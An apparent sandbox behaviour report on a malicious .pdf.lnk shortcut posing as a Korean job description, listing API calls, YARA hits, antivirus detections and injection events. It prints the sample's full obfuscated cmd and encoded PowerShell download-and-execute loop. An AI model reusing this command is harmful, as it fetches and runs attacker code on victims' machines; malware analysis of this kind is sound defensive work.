NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02166000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02793000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02794000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02795000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02796000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02797000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02798000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02799000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05330000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05331000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05332000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05333000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05334000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05335000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05336000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05337000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05338000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05339000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0533a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0533b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0533c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0533d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0533e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0533f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05340000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05341000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05342000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05343000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\MLB_KOREAN_JOB_DESCRIPTION.pdf.lnk

Creates a shortcut to an executable file (3 events)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\MLB_KOREAN_JOB_DESCRIPTION.pdf.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk

Creates a suspicious process (2 events)

cmdline

"C:\WINDOWS\system32\cmd.exe" /c set "TjnHYfRxWa=YQBzAGUANg" && set "XxwtDJaPct=sAIAAkAHkA" && set "bDwtozZyqE=0APQAiACkA" && set "BIVGlNsNoU=dAByAHkAew" && set "TcluocXKfb=AgAC0AZwB0" && set "zMIBZriQBh=QAdQByAGkA" && set "ZZusqJZmtQ=xecutionPo" && set "yFXoGrtJrL=4AYwBvAGQA" && set "MmMqeWIOFi=ACAAMAApAA" && set "EqIdOrRmjn=BTAGwAZQBl" && set "qtKFTTYurE=AGkAbgBnAC" && set "snEVWQpOuP=AEcAVgBpAE" && set "TMaEbbgsQT=bgB0ADsACg" && set "RmAFlbgkZU=MAIAAxADUA" && set "mEveuglXTa=AAoAJABjAG" && set "RiGCrpUpab=AHcAWgB3AD" && set "NWLWNbWdCY=QwBvAG4Adg" && set "uKwwRshDBH=cQB1AGUAcw" && set "TyzfJstCFR=BNAG0AVQAy" && set "NfTMXIilyz=B5AGUAKQA7" && set "fFsezeqgeq=QAZQBuAHQA" && set "KgWpffnYAW=A9AD0AIgAp" && set "zhraxSSzuI= "" powers" && set "SdmiBxLDtW=ADoAOgBGAH" && set "zwZZhreAAq=AHQALgBFAG" && set "roifXiuEUg=EASABSADAA" && set "rOmxHGNTgd=AEMASQBJAC" && set "qZLdtCgkin=BuAGcAKABb" && set "fynWIDORfN=AoAFsAUwB5" && set "ihwOxETVfk=Command JA" && set "dchNDOhYMZ=AEkALgBHAG" && set "QJhOrKXjCB=AAkAewAKAA" && set "MhrUTNGYFx=B0AHIAaQBu" && set "lfZAeaeKgt=ACkAOwAKAC" && set "kKsTLYyupN=AHcAcAAgAC" && set "sNPYhFfxWg=AGIAeQBlAD" && set "TpSIyPtwZv=UAdABTAHQA" && set "KkkXMtHfZU=ZQBtAC4AVA" && set "WHNdSAzHNf=BCAHoATAAy" && set "rNyOCSQIKg=BuAHYAbwBr" && set "dWYFHRStXF=0AWwBTAHkA" && set "bkVkhPTSec=NoLogo -No" && set "QeVrJoypwB=ADEAOwAKAA" && set "RUaWyRHQuU=IAbABZADIA" && set "FpUOTNStKA=AGcAKAAiAG" && set "VYNegyYlXL=AGUAVwBSAG" && set "qIKCUwBAij=0ALgBDAG8A" && set "EoowUnpyYh=indowStyle" && set "DfsnUcTgFg=AFkAagBnAH" && set "BnCmaRDKwV=IAA9ACAAMQ" && set "LZfAavpFYm=AEUAbgBjAG" && set "QEhDXYbieC=UAKAAkAGMA" && set "VLQrvNbsvi=AHoATABuAF" && set "uJfzqLEKfc=KQA7AAoAJA" && set "sBejxLYLRs=IAA9ACAAKA" && set "CABYzgxxvr=bwB1AG4AdA" && set "ucVjukLiUo=start /min" && set "briQMnmKwu=8AbgB0AGUA" && set "cUspthchmF=MAeQBzAHQA" && set "bDCaPovznl=ZwB2AFoAZw" && set "lLiNvvsyHR=AuAFQAZQB4" && set "lvMKFTtJON=AHAAIAAtAH" && set "yJRnVfsvnj=AGMAbwBuAH" && set "usjZfmaFEE=AHAAPQBbAF" && set "dxVJkbAfud=BlAHgAdAAu" && set "fXwjcPVYLt=cAByAGUAcw" && set "GoGsnQnaWQ=eABsAEwAMw" && set "EUegkQmPFZ=AFMAeQBzAH" && set "AHQVhJQFkw=gAIgBhAFcA" && set "lbWAUubWaU=bgB2AGUAcg" && set "jUrJQWBMnl=AgAC0APQAg" && set "FncKXuOuBq=AJAAkAYgBy" && set "ovxVxqlhIr=IAAtAFUAcw" && set "aDaRlJPjdb=BlAHIAdABd" && set "bnJWBwevld=0AQgBhAHMA" && set "qheQdOsxFy=ZQA2ADQAUw" && set "eqgCyTWOdO=YwBIAE0ANg" && set "brdcQqNkUD=AKAAkACQAk" && set "kiRfpiioRm=B6AGQAbABN" && set "mSfXwDbnfy=AKAH0ACgA=" && set "hKWOQKomJA=WgBqAGcAeg" && set "CdfUWpIjbg=NABaAEQAYw" && set "QfQNxampWp=BMAHkAOQB0" && set "NhpKzjZEKH=0AVwBWAGgA" && set "jEDkeIrPfl=cATQBXAEUA" && set "EUzKheKIZQ=IAA9ACAASQ" && set "odfhiqYUUz=B5AGQAdQB2" && set "sceysoispa=gAZABHAEYA" && set "ehEGAHjiti=IAbwBtAEIA" && set "iLjcIMbryB=ACAAJABjAG" && set "ZHfDZDjgfR=UAYgBSAGUA" && set "ytLfgwbtYo=A6ADoAQQBT" && set "DIqxJWEcWP=AkAGkAcwB1" && set "gsxhMcHUWS=AJAAkASQBu" && set "CUqShwKEaH=sACgAJAH0A" && set "rppWWkilnL=8AZABpAG4A" && set "GyqShYfrXf=AGgAaQBsAG" && set "ZOXKrOSKdN=YQByAHQALQ" && set "hsfywJokQA=EAcgBzAGkA" && set "bCqmXvKujn=B0AF0AOgA6" && set "oIvYUHvtVL=B0ACAALQBV" && set "xaWfxreeLe=AHMAdABlAG" && set "zuUXwkFdnO=s -Encoded" && set "GXxBHSTMdH=MgBRADAAWQ" && set "rsIQUsNlkm=aQBuAGcAXQ" && set "ETqoSfTRik=UwB0AHIAaQ" && set "FVFJBFYJfr=ZwBdADoAOg" && set "btnYpOFMnb=BzAGkAbwBu" && set "VOaCORREdU=8AdQBuAHQA" && set "qyuXVxOLbl=AEYAcgBvAG" && set "FhqfnpmgSH= hidden -E" && set "wMESCJLjmS=bwB1AG4AdA" && set "QxZTecsJUN=A1AEwAbQBw" && set "OEzksKkxlb=AGUAYQBrAD" && set "TatfGwoMOf=cwB0AGUAbQ" && set "LmOCYEfCmj=AGkAYwBQAG" && set "uuqfIlaqLf=UALQBFAHgA" && set "JjtTKfdVpE=kACQAkAGMA" && set "wOmIWVIxUD=OwAKAAkAfQ" && set "vWzfPwZZCL=AGUALQBXAG" && set "mqBIVdfolH=kACQBTAHQA" && set "ReqWKmxvIW=NQBlAEcANQ" && set "ZpivkNWzqU=licy bypas" && set "APrDhxXOtJ=AwADsACgB3" && set "vOKQgfXssa=oAewAKAAkA" && set "fLfoRKHUPY=AHIAaQAgAC" && set "gxfsAbxZwa=AFYAbQBPAF" && set "IoUEJKKCup=A0AFMAdABy" && set "FIBEVNoySs=CgAJAGMAYQ" && set "wGAGFuCgcm=cgBpAG4AZw" && set "iPluMIEhFh=BlAEIAYQBz" && set "bsSNPRwkSd=ZAB1AHYAYg" && set "VeHElgDcva=BvAGUAbQBO" && set "IJCSLLAcox=QAdQByAGkA" && set "FhMwlnEESP=hell.exe -" && set "rWiAduopww=Profile -W" && set "bIgWAgOjfP=4ARwBlAHQA" && set "TfrYJcMrsc=cASQAzAE0A" && set "lJUzkPKMYd=AHYAbwBrAG" && set "GWMjUKeJXq=BBAFMAQwBJ" && set "ySjgGpmQmr=B0AGMAaAAK" && set "pIVrtuwCCH=BpAHMAdQB3" && set "yzlxQSyhfd=bgBnADsACg" && set "ISoiKxxYFC=QAZQBtAC4A" && call %ucVjukLiUo%%zhraxSSzuI%%FhMwlnEESP%%bkVkhPTSec%%rWiAduopww%%EoowUnpyYh%%FhqfnpmgSH%%ZZusqJZmtQ%%ZpivkNWzqU%%zuUXwkFdnO%%ihwOxETVfk%%odfhiqYUUz%%sNPYhFfxWg%%dWYFHRStXF%%TatfGwoMOf%%lLiNvvsyHR%%zwZZhreAAq%%yFXoGrtJrL%%rsIQUsNlkm%%ytLfgwbtYo%%rOmxHGNTgd%%bIgWAgOjfP%%ETqoSfTRik%%qZLdtCgkin%%EUegkQmPFZ%%ISoiKxxYFC%%NWLWNbWdCY%%aDaRlJPjdb%%SdmiBxLDtW%%ehEGAHjiti%%TjnHYfRxWa%%IoUEJKKCup%%qtKFTTYurE%%AHQVhJQFkw%%GoGsnQnaWQ%%WHNdSAzHNf%%gxfsAbxZwa%%TfrYJcMrsc%%GXxBHSTMdH%%kiRfpiioRm%%snEVWQpOuP%%NhpKzjZEKH%%hKWOQKomJA%%TyzfJstCFR%%DfsnUcTgFg%%jEDkeIrPfl%%CdfUWpIjbg%%QxZTecsJUN%%RiGCrpUpab%%bDwtozZyqE%%uJfzqLEKfc%%pIVrtuwCCH%%usjZfmaFEE%%cUspthchmF%%KkkXMtHfZU%%dxVJkbAfud%%LZfAavpFYm%%rppWWkilnL%%FVFJBFYJfr%%GWMjUKeJXq%%dchNDOhYMZ%%TpSIyPtwZv%%wGAGFuCgcm%%fynWIDORfN%%xaWfxreeLe%%qIKCUwBAij%%lbWAUubWaU%%bCqmXvKujn%%qyuXVxOLbl%%bnJWBwevld%%qheQdOsxFy%%MhrUTNGYFx%%FpUOTNStKA%%roifXiuEUg%%eqgCyTWOdO%%QfQNxampWp%%VYNegyYlXL%%sceysoispa%%ReqWKmxvIW%%VeHElgDcva%%VLQrvNbsvi%%RUaWyRHQuU%%bDCaPovznl%%KgWpffnYAW%%lfZAeaeKgt%%zMIBZriQBh%%sBejxLYLRs%%DIqxJWEcWP%%kKsTLYyupN%%XxwtDJaPct%%bsSNPRwkSd%%NfTMXIilyz%%mEveuglXTa%%VOaCORREdU%%BnCmaRDKwV%%APrDhxXOtJ%%GyqShYfrXf%%QEhDXYbieC%%CABYzgxxvr%%TcluocXKfb%%MmMqeWIOFi%%vOKQgfXssa%%BIVGlNsNoU%%brdcQqNkUD%%yJRnVfsvnj%%fFsezeqgeq%%EUzKheKIZQ%%rNyOCSQIKg%%vWzfPwZZCL%%ZHfDZDjgfR%%uKwwRshDBH%%oIvYUHvtVL%%fLfoRKHUPY%%IJCSLLAcox%%ovxVxqlhIr%%iPluMIEhFh%%LmOCYEfCmj%%hsfywJokQA%%yzlxQSyhfd%%gsxhMcHUWS%%lJUzkPKMYd%%uuqfIlaqLf%%fXwjcPVYLt%%btnYpOFMnb%%iLjcIMbryB%%briQMnmKwu%%TMaEbbgsQT%%FncKXuOuBq%%OEzksKkxlb%%CUqShwKEaH%%FIBEVNoySs%%ySjgGpmQmr%%QJhOrKXjCB%%JjtTKfdVpE%%wMESCJLjmS%%jUrJQWBMnl%%QeVrJoypwB%%mqBIVdfolH%%ZOXKrOSKdN%%EqIdOrRmjn%%lvMKFTtJON%%RmAFlbgkZU%%wOmIWVIxUD%%mSfXwDbnfy%

cmdline

powershell.exe -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand JAB5AGQAdQB2AGIAeQBlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAFcAeABsAEwAMwBCAHoATAAyAFYAbQBPAFcASQAzAE0AMgBRADAAWQB6AGQAbABNAEcAVgBpAE0AVwBWAGgAWgBqAGcAegBNAG0AVQAyAFkAagBnAHcATQBXAEUANABaAEQAYwA1AEwAbQBwAHcAWgB3AD0APQAiACkAKQA7AAoAJABpAHMAdQB3AHAAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAGEASABSADAAYwBIAE0ANgBMAHkAOQB0AGUAVwBSAGgAZABHAEYANQBlAEcANQBvAGUAbQBOAHoATABuAFIAbABZADIAZwB2AFoAZwA9AD0AIgApACkAOwAKACQAdQByAGkAIAA9ACAAKAAkAGkAcwB1AHcAcAAgACsAIAAkAHkAZAB1AHYAYgB5AGUAKQA7AAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADsACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAAoAewAKAAkAdAByAHkAewAKAAkACQAkAGMAbwBuAHQAZQBuAHQAIAA9ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGkAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABjAG8AbgB0AGUAbgB0ADsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAJAGMAYQB0AGMAaAAKAAkAewAKAAkACQAkAGMAbwB1AG4AdAAgAC0APQAgADEAOwAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwAKAAkAfQAKAH0ACgA=

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Nov. 17, 2023, 2:21 p.m.	thread_identifier: 2812 thread_handle: 0x00000084 process_identifier: 2808 current_directory: filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell.exe -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand JAB5AGQAdQB2AGIAeQBlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAFcAeABsAEwAMwBCAHoATAAyAFYAbQBPAFcASQAzAE0AMgBRADAAWQB6AGQAbABNAEcAVgBpAE0AVwBWAGgAWgBqAGcAegBNAG0AVQAyAFkAagBnAHcATQBXAEUANABaAEQAYwA1AEwAbQBwAHcAWgB3AD0APQAiACkAKQA7AAoAJABpAHMAdQB3AHAAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAGEASABSADAAYwBIAE0ANgBMAHkAOQB0AGUAVwBSAGgAZABHAEYANQBlAEcANQBvAGUAbQBOAHoATABuAFIAbABZADIAZwB2AFoAZwA9AD0AIgApACkAOwAKACQAdQByAGkAIAA9ACAAKAAkAGkAcwB1AHcAcAAgACsAIAAkAHkAZAB1AHYAYgB5AGUAKQA7AAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADsACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAAoAewAKAAkAdAByAHkAewAKAAkACQAkAGMAbwBuAHQAZQBuAHQAIAA9ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGkAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABjAG8AbgB0AGUAbgB0ADsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAJAGMAYQB0AGMAaAAKAAkAewAKAAkACQAkAGMAbwB1AG4AdAAgAC0APQAgADEAOwAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwAKAAkAfQAKAH0ACgA= filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Nov. 17, 2023, 2:21 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (40 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\MLB_KOREAN_JOB_DESCRIPTION.pdf.lnk

File has been identified by 16 AntiVirus engines on VirusTotal as malicious (16 events)

Skyhigh	BehavesLike.Trojan.tx
ALYac	Heur.BZC.YAX.Pantera.68.824944F2
VIPRE	Heur.BZC.YAX.Pantera.68.10D50FC3
Kaspersky	HEUR:Trojan.Multi.Powenot.a
BitDefender	Heur.BZC.YAX.Pantera.68.10D50FC3
MicroWorld-eScan	Heur.BZC.YAX.Pantera.68.10D50FC3
Emsisoft	Heur.BZC.YAX.Pantera.68.10D50FC3 (B)
FireEye	Heur.BZC.YAX.Pantera.68.10D50FC3
Sophos	Troj/LnkObf-I
MAX	malware (ai score=80)
Kingsoft	Script.Troj.BigLnk.22142
Arcabit	Heur.BZC.YAX.Pantera.68.10D50FC3 [many]
ZoneAlarm	HEUR:Trojan.Multi.Powenot.a
GData	Heur.BZC.YAX.Pantera.68.824944F2
Google	Detected
VBA32	Trojan.Link.Crafted

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2552 resumed a thread in remote process 2704
Process injection	Process 2704 resumed a thread in remote process 2808
NtResumeThread Nov. 17, 2023, 2:21 p.m.	thread_handle: 0x00000330 suspend_count: 1 process_identifier: 2704	1	0	0
NtResumeThread Nov. 17, 2023, 2:21 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2808	1	0	0

Creates a suspicious Powershell process (4 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
